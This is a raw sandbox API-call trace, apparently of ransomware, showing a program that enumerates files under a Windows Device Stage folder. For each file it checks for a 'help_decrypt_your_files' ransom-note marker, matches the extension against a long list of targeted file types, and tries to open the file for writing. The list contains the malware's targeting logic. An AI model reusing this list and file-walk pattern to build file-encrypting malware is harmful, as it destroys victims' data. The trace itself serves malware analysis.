	[0167.477] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"
	[0167.477] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned 100
	[0167.477] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.478] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.478] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.479] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.479] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.479] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.481] CloseHandle (hObject=0xffffffff) returned 1
	[0167.481] CloseHandle (hObject=0xffffffff) returned 1
	[0167.481] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xadc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="device.png", cAlternateFileName="")) returned 1
	[0167.481] lstrcmpW (lpString1="device.png", lpString2="..") returned 1
	[0167.481] lstrcmpW (lpString1="device.png", lpString2=".") returned 1
	[0167.482] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.482] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="device.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"
	[0167.482] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98
	[0167.482] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.482] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", cchLength=0x62 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 0x62
	[0167.482] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.483] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.483] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"
	[0167.483] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png") returned 98
	[0167.483] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.483] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.483] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0167.484] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.484] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.490] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.491] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.491] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.491] CloseHandle (hObject=0xffffffff) returned 1
	[0167.491] CloseHandle (hObject=0xffffffff) returned 1
	[0167.491] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2136a4c1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2136a4c1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2136a4c1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="overlay.png", cAlternateFileName="")) returned 1
	[0167.491] lstrcmpW (lpString1="overlay.png", lpString2="..") returned 1
	[0167.492] lstrcmpW (lpString1="overlay.png", lpString2=".") returned 1
	[0167.492] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\"
	[0167.492] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="overlay.png" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"
	[0167.492] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99
	[0167.492] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.492] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", cchLength=0x63 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 0x63
	[0167.492] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.492] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.492] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"
	[0167.493] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png") returned 99
	[0167.493] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.493] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0167.493] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.493] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.